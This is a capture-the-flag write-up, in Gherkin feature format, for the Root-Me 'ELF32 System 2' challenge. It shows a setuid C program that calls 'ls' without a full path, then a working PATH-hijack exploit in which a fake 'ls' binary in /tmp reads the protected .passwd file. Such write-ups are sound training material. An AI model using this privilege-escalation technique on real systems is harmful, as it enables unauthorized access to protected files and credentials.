## Version 2.0
## language: en

Feature:
  Site:
    www.root-me.org
  Category:
    bash
    scripting
  User:
    bianfa
  Goal:
    Get the password from .passwd file

 Background:
   Hacker's software:
     | <Software name> | <Version>     |
     | Kali Linux      | 2020.3        |
     | Firefox         | 68.10.0esr    |

 Machine information:
   Given the challenge URL
   """
   https://www.root-me.org/en/Challenges/App-Script/ELF32-System-2
   """
   When I open this url with Firefox
   Then I see some credentiales to access a machine via SSH
   And Enter by console in Kali with the credentiales
   Then I see some info
   """
   ----------------

   Welcome on challenge02    /

   -----------------------------

   /tmp and /var/tmp are writeable
   """
   And I see two files ch12 ch12.c .passwd when running ls -a

 Scenario: Fail:Attempt-use-cat-directly
   When I run cat command get Permission denied
   Then I run ls -a ch12 I get
   """
   -rwsr-x--- 1 app-script-ch12-cracked app-script-ch12 7252 May 19  2019 ch12
   """
   And I see that ch12 has permissions to run as root
   Then I conclude that can access to .passwd file with this script

 Scenario: Success:change-function-of-ls-command
   Given the code from ch12.c file
   """
   #include <stdlib.h>
   #include <stdio.h>
   #include <unistd.h>
   #include <sys/types.h>

   int main(){
    setreuid(geteuid(), geteuid());
    system("ls -lA /challenge/app-script/ch12/.passwd");
    return 0;
   }
   """
   Then I see that I should change 'ls -lA' for 'cat'
   When I create the folder 'command' in /tmp
   Then I change directory to /tmp/command
   And I create the file 'ls.c' in /tmp/command
   And I run nano ./ls.c for add the follow code
   """
   #include <stdlib.h>
   #include <stdio.h>

   int main(){
    system("cat /challenge/app-script/ch12/.passwd");
    return 0;
   }
   """
   When I compile the code with gcc command
   """
   gcc ls.c -o ls
   """
   Then I add execute permissions to ls file
   """
   chmod +x ./ls
   """
   And change the value of PATH variable
   """
   export PATH=/tmp/command/:$PATH
   """
   When executing ch12, use our 'ls' command which works like a 'cat'
   Then We get the flag
   And it solves the challenge
